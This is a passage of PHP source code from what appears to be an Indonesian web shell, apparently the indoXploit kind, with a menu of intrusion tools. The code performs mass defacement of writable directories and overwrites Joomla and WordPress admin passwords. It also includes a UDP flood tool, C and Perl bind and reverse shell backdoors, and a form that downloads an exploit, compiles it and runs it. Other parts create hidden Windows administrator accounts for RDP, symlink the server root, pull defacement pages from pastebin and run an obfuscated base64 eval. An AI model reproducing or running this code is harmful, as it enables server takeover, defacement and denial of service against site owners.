1285 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp',
1286 'adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
1287 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp',
1288 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
1289 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp');
1290 echo "<table class='w3-table w3-border'><thead class='w3-indigo'><th>Website</th><th>Status</th></thead>";
1291 foreach($trying as $sec)
1292 {
1293 $urll=$url.'/'.$sec;
1294
1295 if(urlExist($urll))
1296 {
1297 echo '<tr class="w3-green"><td><a href="'.$urll.'">'.$urll.'</a></td><td><i><b><u>FOUND</u></b></i></td></tr>';
1298 exit;
1299 }
1300 else
1301 {
1302 echo '<tr class="w3-grey"><td>'.$urll.'</td><td>NOT FOUND</td></tr>';
1303 }
1304 }
1305 echo '<tr class="w3-orange w3-center"><td colspan=2>Could not find admin page.[!]</td></tr>';
1306 }
1307 else
1308 {
1309 echo '<tr class="w3-indigo w3-centere"><td colspan=2>invalid url Enteindigo</td></tr>';
1310 }
1311 echo "</table>";
1312 }
1313}elseif ($_GET['a']=='md') {
1314 echo'<div class="w3-container w3-center">
1315 <h3 class="w3-center w3-indigo w3-text-shadow w3-text-white"> Mass deface </h3>
1316 <small> by indoXploit </small>';
1317 function sabun_massal($dir,$namafile,$isi_script) {
1318 if(is_writable($dir)) {
1319 $dira = scandir($dir);
1320 foreach($dira as $dirb) {
1321 $dirc = "$dir/$dirb";
1322 $lokasi = $dirc.'/'.$namafile;
1323 if($dirb === '.') {
1324 file_put_contents($lokasi, $isi_script);
1325 } elseif($dirb === '..') {
1326 file_put_contents($lokasi, $isi_script);
1327 } else {
1328 if(is_dir($dirc)) {
1329 if(is_writable($dirc)) {
1330 echo "[<font color=indigo>DONE</font>] $lokasi<br>";
1331 file_put_contents($lokasi, $isi_script);
1332 $idx = sabun_massal($dirc,$namafile,$isi_script);
1333 }
1334 }
1335 }
1336 }
1337 }
1338 }
1339 function sabun_biasa($dir,$namafile,$isi_script) {
1340 if(is_writable($dir)) {
1341 $dira = scandir($dir);
1342 foreach($dira as $dirb) {
1343 $dirc = "$dir/$dirb";
1344 $lokasi = $dirc.'/'.$namafile;
1345 if($dirb === '.') {
1346 file_put_contents($lokasi, $isi_script);
1347 } elseif($dirb === '..') {
1348 file_put_contents($lokasi, $isi_script);
1349 } else {
1350 if(is_dir($dirc)) {
1351 if(is_writable($dirc)) {
1352 echo "[<font color=indigo>DONE</font>] $dirb/$namafile<br>";
1353 file_put_contents($lokasi, $isi_script);
1354 }
1355 }
1356 }
1357 }
1358 }
1359 }
1360 if($_POST['start']) {
1361 if($_POST['tipe_sabun'] == 'mahal') {
1362 echo "<div style='margin: 5px auto; padding: 5px'>";
1363 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1364 echo "</div>";
1365 } elseif($_POST['tipe_sabun'] == 'murah') {
1366 echo "<div style='margin: 5px auto; padding: 5px'>";
1367 sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1368 echo "</div>";
1369 }
1370 } else {
1371 echo "<center>";
1372 echo "<form method='post'>
1373 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
1374 <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
1375 <font style='text-decoration: underline;'>Folder:</font><br>
1376 <input type='text' name='d_dir' value='$_GET[i]' style='width: 450px;' height='10' class='w3-input w3-animate-input'><br>
1377 <font style='text-decoration: underline;'>Filename:</font><br>
1378 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10' class='w3-input w3-animate-input'><br>
1379 <font style='text-decoration: underline;'>Index File:</font><br>
1380 <textarea name='script' style='width:700px; height:400px;' class='w3-indigo w3-code'>JOYFULL KAWAII TRY TO BE THE BEST ;)</textarea><br>
1381 <input type='submit' name='start' value='Mass Deface' style='width: 450px;' class='w3-btn w3-indigo'>
1382 </form></center>";
1383 }
1384}elseif ($_GET['a']=='jrp') {
1385 echo "
1386<div class='w3-container w3-center'>
1387<h3 class='w3-indigo w3-text-white w3-text-shadow w3-center'> joomla reset password </h3><br>";
1388 if(empty($_POST['pwd'])){
1389echo "<FORM method='POST'><table class='w3-table w3-striped' > <tr class='w3-indigo w3-text-shadow'><th colspan='2'>Connect to mySQL </th></tr> <tr><td> Host</td><td>
1390<input type='text' name='localhost' value='localhost' class='w3-input' /></td></tr> <tr><td> Database</td><td>
1391<input type='text' name='database' value='database' class='w3-input'/></td></tr> <tr><td> username</td><td>
1392<input type='text' name='username' value='db_user' class='w3-input'/></td></tr> <tr><td> password</td><td>
1393<input type='password' name='password' value='' class='w3-input'/></td></tr>
1394<tr><td> new user</td><td>
1395<input name='admin' value='admin' class='w3-input'/></td></tr>
1396 <tr><td> new password(12345) </td><td>
1397<input class='w3-input ' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' disabled></td></tr><tr><td colspan='2'>
1398
1399<input type='submit' value='change!' name='send' class='w3-btn w3-indigo w3-btn-block' /></FORM>
1400</td></tr> </table><br><br><br><br>
1401";
1402}else{
1403$localhost = $_POST['localhost'];
1404$database = $_POST['database'];
1405$username = $_POST['username'];
1406$password = $_POST['password'];
1407$pwd = $_POST['pwd'];
1408$admin = $_POST['admin'];
1409@mysql_connect($localhost,$username,$password) or die(mysql_error());
1410@mysql_select_db($database) or die(mysql_error());
1411$hash = crypt($pwd);
1412$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
1413$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
1414$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
1415$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
1416$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
1417$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
1418$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
1419$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
1420if($SQL){
1421echo "<b>Succesfully! password : 12345";
1422}
1423}
1424}elseif ($_GET['a']=='wprp') {
1425 echo "
1426<div class='w3-container w3-center'>
1427<h3 class='w3-indigo w3-text-shadow w3-text-white'> wordpress reset password </h3><br>";
1428
1429 if(empty($_POST['pwd'])){
1430
1431echo "<FORM method='POST'>
1432<table class='w3-table w3-striped'> <tr><th colspan='2' class='w3-indigo w3-text-shadow'>Connect to mySQL server</th></tr> <tr><td> Hostname</td><td>
1433<input class='w3-input' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
1434<input class='w3-input' type='text' name='database' value='wp-' /></td></tr> <tr><td> username</td><td>
1435<input class='w3-input' type='text' name='username' value='wp-' /></td></tr> <tr><td> password</td><td>
1436<input class='w3-input' type='text' name='password' value='**' /></td></tr>
1437<tr><td> User baru</td><td>
1438<input class='w3-input' class='inputz' type='text' name='admin' value='admin' /></td></tr>
1439 <tr><td> Pass Baru</td><td>
1440<input class='w3-input' type='text' name='pwd' value='123456' /></td></tr><tr><td colspan='2'>
1441
1442<input type='submit' value='change!' name='send' class='w3-btn w3-btn-block w3-indigo' /></FORM>
1443</td></tr> </table><br><br><br><br>
1444";
1445}else{
1446$localhost = $_POST['localhost'];
1447$database = $_POST['database'];
1448$username = $_POST['username'];
1449$password = $_POST['password'];
1450$pwd = $_POST['pwd'];
1451$admin = $_POST['admin'];
1452
1453
1454 @mysql_connect($localhost,$username,$password) or die(mysql_error());
1455 @mysql_select_db($database) or die(mysql_error());
1456
1457$hash = crypt($pwd);
1458$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
1459$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
1460$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
1461$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
1462$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
1463$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
1464$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
1465
1466
1467if($a4s){
1468echo "<b> Successfully! password changed!</b> ";
1469}
1470
1471}
1472}elseif ($_GET['a']=='ddos') {
1473echo"<div class='w3-container w3-center'><h3 class='w3-indigo w3-text-shadow w3-text-white'>DDoS Tools</h3><br><br>";
1474echo'<table class="w3-table w3-striped"><tr><tr><td>IP Target</td><td>:</td><td><input type="text" class="w3-input" name="ip" size="48" maxlength="25" value = "0.0.0.0" onblur = "if ( this.value==\'\' ) this.value = \'0.0.0.0\';" onfocus = " if ( this.value == \'0.0.0.0\' ) this.value = \'\';"/></td></tr><tr><td>Time</td><td>:</td><td><input type="text" class="w3-input" name="time" size="48" maxlength="25" value = "time (in seconds)" onblur = "if ( this.value==\'\' ) this.value = \'time (in seconds)\';" onfocus = " if ( this.value == \'time (in seconds)\' ) this.value = \'\';"/>
1475</td></tr><tr><td>Port</td><td>:</td><td><input type="text" class="w3-input" name="port" size="48" maxlength="5" value = "port" onblur = "if ( this.value==\'\' ) this.value = \'port\';" onfocus = " if ( this.value == \'port\' ) this.value = \'\';"/></td></tr></tr></table></b><br><input type="submit" class="w3-btn w3-indigo" name="fire" value=" Firee !!! "></form></div>';
1476$submit = $_POST['fire'];
1477if (isset($submit)) {
1478$packets = 0;
1479$ip = $_POST['ip'];
1480$rand = $_POST['port'];
1481set_time_limit(0);
1482ignore_user_abort(FALSE);
1483$exec_time = $_POST['time'];
1484$time = time();
1485print "Flooded: $ip on port $rand <br><br>";
1486$max_time = $time+$exec_time;
1487for($i=0;$i<65535;$i++){
1488 $out .= "X";
1489}
1490while(1){
1491$packets++;
1492 if(time() > $max_time){
1493 break;
1494 }
1495 $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
1496 if($fp){
1497 fwrite($fp, $out);
1498 fclose($fp);
1499 }
1500}
1501echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
1502}
1503}elseif ($_GET['a']=='net') {
1504if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
1505 $port = trim($_POST['port']);
1506 $passwrd = trim($_POST['bind_pass']);
1507 tulis("bdc.c",$port_bind_bd_c);
1508 exe("gcc -o bdc bdc.c");
1509 exe("chmod 777 bdc");
1510 @unlink("bdc.c");
1511 exe("./bdc ".$port." ".$passwrd." &");
1512 $scan = exe("ps aux");
1513 if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
1514 else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
1515}
1516// bind connect with perl
1517elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
1518 $port = trim($_POST['port']);
1519 $passwrd = trim($_POST['bind_pass']);
1520 tulis("bdp",$port_bind_bd_pl);
1521 exe("chmod 777 bdp");
1522 $p2=which("perl");
1523 exe($p2." bdp ".$port." &");
1524 $scan = exe("ps aux");
1525 if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
1526 else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
1527}
1528// back connect with c
1529elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
1530 $ip = trim($_POST['ip']);
1531 $port = trim($_POST['backport']);
1532 tulis("bcc.c",$back_connect_c);
1533 exe("gcc -o bcc bcc.c");
1534 exe("chmod 777 bcc");
1535 @unlink("bcc.c");
1536 exe("./bcc ".$ip." ".$port." &");
1537 $msg = "Now script try connect to ".$ip." port ".$port." ...";
1538}
1539// back connect with perl
1540elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
1541 $ip = trim($_POST['ip']);
1542 $port = trim($_POST['backport']);
1543 tulis("bcp",$back_connect);
1544 exe("chmod +x bcp");
1545 $p2=which("perl");
1546 exe($p2." bcp ".$ip." ".$port." &");
1547 $msg = "Now script try connect to ".$ip." port ".$port." ...";
1548}
1549elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
1550{
1551 $pilihan = trim($_POST['pilihan']);
1552 $wurl = trim($_POST['wurl']);
1553 $namafile = download($pilihan,$wurl);
1554 if(is_file($namafile)) {
1555
1556 $msg = exe($wcmd);
1557 }
1558 else $msg = "error: file not found $namafile";
1559}
1560echo'<div class="w3-container w3-center"><h3 class="w3-indigo w3-text-white w3-text-shadow">NetSploit</h3><table class="w3-table w3-striped w3-center"><tr class="w3-indigo w3-center"><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr><tr><td>';
1561echo'<table class="w3-table w3-striped"><form method="post" ><tr><td>Port</td><td><input class="w3-input" type="text" name="port" size="26" value="'.$bindport.'"></td></tr><tr><td>Password</td><td><input class="w3-input" type="text" name="bind_pass" size="26" value="'.$bindport_pass.'"></td></tr><tr><td>Use</td><td style="text-align:justify"><p><select class="w3-input" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
1562<input class="w3-btn w3-indigo" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form></table>';
1563echo'</td><td>';
1564echo'<table class="w3-table w3-striped"><form method="post"><tr><td>IP</td><td><input class="w3-input" type="text" name="ip" size="26" value="'.((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")).'"></td></tr><tr><td>Port</td><td><input class="w3-input" type="text" name="backport" size="26" value="'.$bindport.'"></td></tr><tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="w3-input" name="use"><option value="Perl">Perl</option><option value="C">C</option></select><input type="submit" name="backconn" value="Connect" class="w3-btn w3-indigo" style="width:120px"></td></tr></form></table>';
1565echo'</td><td>';
1566echo'<table class="w3-table w3-striped"><form method="post" ><tr><td>url</td><td><input class="w3-input" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr><tr><td>cmd</td><td><input class="w3-input" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td></tr><tr><td><select size="1" class="w3-input" name="pilihan"><option value="wwget">wget</option><option value="wlynx">lynx</option><option value="wfread">fread</option><option value="wfetch">fetch</option><option value="wlinks">links</option><option value="wget">GET</option><option value="wcurl">curl</option></select></td><td colspan="2"><input type="submit" name="expcompile" value="Go" style="width:246px;" class="w3-btn w3-indigo"></td></tr></form></table>';
1567echo'</td></tr></table><div style="text-align:center;margin:2px;">'.$msg.'</div></div>';
1568}elseif ($_GET['a']=='zh') {
1569echo'<div class="w3-container w3-center"><h3 class="w3-indigo w3-text-shadow w3-text-shadow"> Zone-H Mass Notifer </h3>';
1570echo'<form method="post"><center><input type="text" name="depecer" style="width:500px" placeholder="defacer" class="w3-input"><br><textarea name="url" placeholder="http://korban.com" style="width:500px;height:300px;" class="w3-indigo w3-code"></textarea><br><input type="submit" name="go" value="submit" class="w3-btn w3-indigo"></form>';
1571$url = explode("\r\n", $_POST['url']);
1572$go = $_POST['go'];
1573function kirim($target,$hacker) {
1574 $ch = curl_init();
1575 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1576 curl_setopt($ch, CURLOPT_URL, "http://zone-h.org/notify/single");
1577 curl_setopt($ch, CURLOPT_POST, true);
1578 curl_setopt($ch, CURLOPT_POSTFIELDS, array(
1579 "defacer" => $hacker,
1580 "domain1" => $target,
1581 "hackmode" => "1",
1582 "reason" => "1",
1583 ));
1584 $res = curl_exec($ch);
1585 curl_close($ch);
1586 return preg_match("/<font color=\"indigo\">OK<\/font><\/li>/", $res);
1587}
1588if($go) {
1589 foreach($url as $sites) {
1590 if(kirim($sites,$_POST['depecer'])) {
1591 echo "<br>[ OK ] => $sites <br>";
1592 } else {
1593 echo "<br>[ ERROR ] => $sites <br>";
1594 }
1595 }
1596}
1597
1598}elseif ($_GET['a']=='em') {
1599$e=function_exists('mail');
1600 if($e){
1601 echo "<div class='w3-container w3-center'><h3 class='w3-indigo w3-text-shadow w3-text-white'> Email </h3><br>";
1602 echo"<form method='post' ><table class='w3-table w3-striped'><tr><td>from :</td><td><input type='text' name='from' value='shutdown57@indonesia.go.id' class='w3-input' ></td></tr><tr><td>For:</td><td><input type='text' name='for' value='admin@".$_SERVER['HTTP_HOST']."' class='w3-input'></td></tr><tr><td>Subject:</td><td><input type='text' name='subject' value='patch ur site!' class='w3-input' ></td></tr><tr><td>COntent:</td><td><textarea name='cont' style='width:100%;height:300px' class='w3-indigo w3-code'>please..patch ur face! ur face is bad :p </textarea></td></tr><tr><td colspan='2'><input type='submit' name='sent' value='send!!' class='w3-btn w3-indigo w3-btn-block' ></td></tr></table></form>";
1603}else{
1604 echo" mail() function does not exists in this website!";
1605}
1606if(isset($_POST['sent'])){
1607 if(mail($_POST['for'],$_POST['subject'],$_POST['cont'],$_POST['from'])){
1608 echo "send!!".$_POST['for'];
1609 }else{
1610 echo"failed !!!";
1611 }
1612}
1613}elseif ($_GET['a']=='sym') {
1614 system('ln -s / achan.txt');
1615$hta ="Options Indexes FollowSymLinks\nDirectoryIndex ssssss.htm\nAddType txt .php\nAddHandler txt .php";
1616$file = fopen(".htaccess","w+");
1617$write = fwrite ($file ,$hta);
1618$sym = symlink("/","achan.txt");
1619$rt="<br><a href='achan.txt' TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
1620touch me senpai..</b></font></a></center>";
1621echo "<center><br><br><b>Done.. !</b><br>".$rt;
1622}elseif ($_GET['a']=='rdp') {
1623 if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1624echo "<div class='w3-container w3-center'><h3 class='w3-indigo w3-center w3-text-shadow w3-text-white'>Remote Desktop Protocol Tools</h3>";
1625 if($_POST['create']) {
1626 $user = htmlspecialchars($_POST['user']);
1627 $pass = htmlspecialchars($_POST['pass']);
1628 if(preg_match("/$user/", exe("net user"))) {
1629 echo "[INFO] -> <font color=indigo>user <font color=indigo>$user</font> already exists</font>";
1630 } else {
1631 $add_user = exe("net user $user $pass /add");
1632 $add_groups1 = exe("net localgroup Administrators $user /add");
1633 $add_groups2 = exe("net localgroup Administrator $user /add");
1634 $add_groups3 = exe("net localgroup Administrateur $user /add");
1635 echo "[ RDP ACCOUNT INFO ]<br>
1636 ------------------------------<br>
1637 IP: <font color=indigo>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
1638 Username: <font color=indigo>$user</font><br>
1639 Password: <font color=indigo>$pass</font><br>
1640 ------------------------------<br><br>
1641 [ STATUS ]<br>
1642 ------------------------------<br>
1643 ";
1644 if($add_user) {
1645 echo "[add user] -> <font color='indigo'>Successfully :D</font><br>";
1646 } else {
1647 echo "[add user] -> <font color='indigo'>Failed !</font><br>";
1648 }
1649 if($add_groups1) {
1650 echo "[add localgroup Administrators] -> <font color='indigo'>Successfully :D</font><br>";
1651 } elseif($add_groups2) {
1652 echo "[add localgroup Administrator] -> <font color='indigo'>Successfully :D</font><br>";
1653 } elseif($add_groups3) {
1654 echo "[add localgroup Administrateur] -> <font color='indigo'>Successfully :D</font><br>";
1655 } else {
1656 echo "[add localgroup] -> <font color='indigo'>Failed !</font><br>";
1657 }
1658 echo "------------------------------<br>";
1659 }
1660 } elseif($_POST['s_opsi']) {
1661 $user = htmlspecialchars($_POST['r_user']);
1662 if($_POST['opsi'] == '1') {
1663 $cek = exe("net user $user");
1664 echo "Checking username <font color=indigo>$user</font> ....... ";
1665 if(preg_match("/$user/", $cek)) {
1666 echo "[ <font color=indigo>already Exists</font> ]<br>
1667 ------------------------------<br><br>
1668 <pre>$cek</pre>";
1669 } else {
1670 echo "[ <font color=indigo>Not Exists</font> ]";
1671 }
1672 } elseif($_POST['opsi'] == '2') {
1673 $cek = exe("net user $user achan");
1674 if(preg_match("/$user/", exe("net user"))) {
1675 echo "[change password: <font color=indigo>achan</font>] -> ";
1676 if($cek) {
1677 echo "<font color=indigo>Successfully :D</font>";
1678 } else {
1679 echo "<font color=indigo>Successfully :D</font>";
1680 }
1681 } else {
1682 echo "[INFO] -> <font color=indigo>user <font color=indigo>$user</font> Not Exists</font>";
1683 }
1684 } elseif($_POST['opsi'] == '3') {
1685 $cek = exe("net user $user /DELETE");
1686 if(preg_match("/$user/", exe("net user"))) {
1687 echo "[remove user: <font color=indigo>$user</font>] -> ";
1688 if($cek) {
1689 echo "<font color=indigo>Successfully :D</font>";
1690 } else {
1691 echo "<font color=indigo>Failed :p</font>";
1692 }
1693 } else {
1694 echo "[INFO] -> <font color=indigo>user <font color=indigo>$user</font> not exists</font>";
1695 }
1696 } else {
1697 //
1698 }
1699 } else {
1700 echo "-- Create RDP --<br>
1701 <form method='post'>
1702 <table class='w3-table w3-striped'><tr><td>Username:</td><td>
1703 <input type='text' name='user' placeholder='username' value='achan' class='w3-input' requiindigo></td></tr><tr><td>Password:</td><td>
1704 <input type='text' name='pass' placeholder='password' value='achan' class='w3-input' requiindigo></td></tr><tr><td colspan='2'>
1705 <input type='submit' name='create' value='Go!' class='w3-btn w3-btn-block w3-indigo'></td></tr></table>
1706 </form>
1707 -- Option --<br>
1708 <form method='post'>
1709 <table class='w3-table w3-striped'><tr><td>Username:</td><td>
1710 <input type='text' name='r_user' placeholder='username' class='w3-input' requiindigo></td></tr><tr><td>Options:</td><td>
1711 <select name='opsi' class='w3-input'>
1712 <option value='1'>Check Username</option>
1713 <option value='2'>Change Password</option>
1714 <option value='3'>Delete Username</option>
1715 </select></td></tr><tr><td colspan='2'>
1716 <input type='submit' name='s_opsi' value='Go!' class='w3-btn w3-btn-block w3-indigo'></td></tr></table>
1717 </form>
1718 ";
1719 }
1720 }else{
1721 echo "<div class='w3-indigo w3-panel'><h3>This Tools Just Support in Windows Server.</h3></div>";
1722 }
1723
1724}elseif ($_GET['a']=='wos') {
1725 echo "
1726 <div class='w3-container w3-center'>
1727 <h3 class='w3-indigo w3-text-white w3-text-shadow w3-center'>WithOutShadow Priv8 Script Deface</h3>
1728 <form method='post'>filename : <input type='text' name='wos' value='".$_GET['i']."/wos.html' class='w3-input'><input type='submit' value='deface!' class='w3-btn w3-indigo'></form>";
1729 if(isset($_POST['wos'])){
1730 $fp=fopen($_POST['wos'],"w");
1731 $isi=file_get_contents('http://pastebin.com/raw/0Fm2SLTp');
1732 if(fwrite($fp,$isi)){
1733 echo "<script>
1734 alert('defaced!');
1735 </script>";
1736 }
1737 fclose($fp);
1738 }
1739}elseif ($_GET['a']=='ps') {
1740 echo "
1741 <div class='w3-container w3-center'>
1742 <h3 class='w3-indigo w3-text-white w3-text-shadow w3-center'>PeSeC Priv8 Script Deface</h3>
1743 <form method='post'>filename : <input type='text' name='ps' value='".$_GET['i']."/PeSeC.html' class='w3-input'><input type='submit' value='deface!' class='w3-btn w3-indigo'></form>";
1744 if(isset($_POST['ps'])){
1745 $fp=fopen($_POST['ps'],"w");
1746 $isi=file_get_contents('http://pastebin.com/raw/SDHE0W4T');
1747 if(fwrite($fp,$isi)){
1748 echo "<script>
1749 alert('defaced!');
1750 </script>";
1751 }
1752 fclose($fp);
1753 }
1754}elseif ($_GET['a']=='fr') {
1755 ob_start();
1756 function reverse($url) {
1757 $ch = curl_init("http://domains.yougetsignal.com/domains.php");
1758 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
1759 curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
1760 curl_setopt($ch, CURLOPT_HEADER, 0);
1761 curl_setopt($ch, CURLOPT_POST, 1);
1762 $resp = curl_exec($ch);
1763 $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
1764 $array = explode(",,", $resp);
1765 unset($array[0]);
1766 foreach($array as $lnk) {
1767 $lnk = "http://$lnk";
1768 $lnk = str_replace(",", "", $lnk);
1769 echo $lnk."\n";
1770 ob_flush();
1771 flush();
1772 }
1773 curl_close($ch);
1774 }
1775 function cek($url) {
1776 $ch = curl_init($url);
1777 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
1778 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
1779 $resp = curl_exec($ch);
1780 return $resp;
1781 }
1782 $cwd = getcwd();
1783 $ambil_user = explode("/", $cwd);
1784 $user = $ambil_user[2];
1785 if($_POST['reverse']) {
1786 $site = explode("\r\n", $_POST['url']);
1787 $file = $_POST['file'];
1788 foreach($site as $url) {
1789 $cek = cek("$url/~$user/$file");
1790 if(preg_match("/hacked/", $cek)) {
1791 echo "<center> URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=indigo>Fake Root!</font><br>";
1792 }
1793 }
1794 } else {
1795 echo "<div class='w3-container w3-center'>
1796 <h3 class='w3-indigo w3-text-shadow w3-text-white'>Fake Root</h3>
1797 <small>By : indoXploit </small>
1798 <form method='post'>
1799 Filename: <br><input type='text' name='file' value='deface.html' class='w3-input'><br>
1800 User: <br><input type='text' value='$user' class='w3-input' readonly><br>
1801 Domain: <br>
1802 <textarea style='width:70%;height:400px;' name='url' class='w3-indigo w3-code'>";
1803 reverse($_SERVER['HTTP_HOST']);
1804 echo "</textarea><br>
1805 <input type='submit' name='reverse' value='Scan Fake Root!' class='w3-btn w3-indigo '>
1806 </form>
1807 </div>";
1808 }
1809}elseif ($_GET['a']=='themes') {
1810 $i=$_GET['i'];
1811 $c=$_GET['col'];
1812 if(empty($c)){
1813 // ini bukan log atau semacamnya kok, ini cuma html doang -_-" kalo gk percaya decode aja.
1814 // alesan di encode biar waktu ganti tema ini gak ikut ke ganti.
1815 @eval(base64_decode("ZWNobyAiPGRpdiBjbGFzcz0ndzMtY29udGFpbmVyIHczLWNlbnRlcic+DQoJCTxoMyBjbGFzcz0ndzMtcmVkIHczLXRleHQtc2hhZG93IHczLXRleHQtd2hpdGUnPkdsb2JhbCBDb2xvcjwvaDM+IjsNCgllY2hvJyA8ZGl2IGNsYXNzPSJ3My1kcm9wZG93bi1ob3ZlciI+DQogIDxhIGNsYXNzPSJ3My1yZWQgdzMtYnRuIiBzdHlsZT0id2lkdGg6MzAwcHg7Ij5TRUxFQ1QgVEhFTUVTPC9hPg0KICA8ZGl2IGNsYXNzPSJ3My1kcm9wZG93bi1jb250ZW50IHczLWJvcmRlciIgc3R5bGU9IndpZHRoOjMwMHB4OyI+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1yZWQiICBjbGFzcz0idzMtcmVkIj5SRUQ8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1waW5rIiAgY2xhc3M9InczLXBpbmsiPlBJTks8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1vcmFuZ2UiIGNsYXNzPSJ3My1vcmFuZ2UiPk9SQU5HRTwvYT4NCiAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD15ZWxsb3ciICBjbGFzcz0idzMteWVsbG93Ij5ZRUxMT1c8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1ncmVlbiIgIGNsYXNzPSJ3My1ncmVlbiI+R1JFRU48L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD10ZWFsIiBjbGFzcz0idzMtdGVhbCI+VEVBTDwvYT4NCiAgICAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1jeWFuIiAgY2xhc3M9InczLWN5YW4iPkNZQU48L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1saW1lIiAgY2xhc3M9InczLWxpbWUiPkxJTUU8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1ibHVlIiBjbGFzcz0idzMtYmx1ZSI+QkxVRTwvYT4NCiAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1pbmRpZ28iICBjbGFzcz0idzMtaW5kaWdvIj5JTkRJR088L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1wdXJwbGUiICBjbGFzcz0idzMtcHVycGxlIj5QVVJQTEU8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1raGFraSIgY2xhc3M9InczLWtoYWtpIj5LSEFLSTwv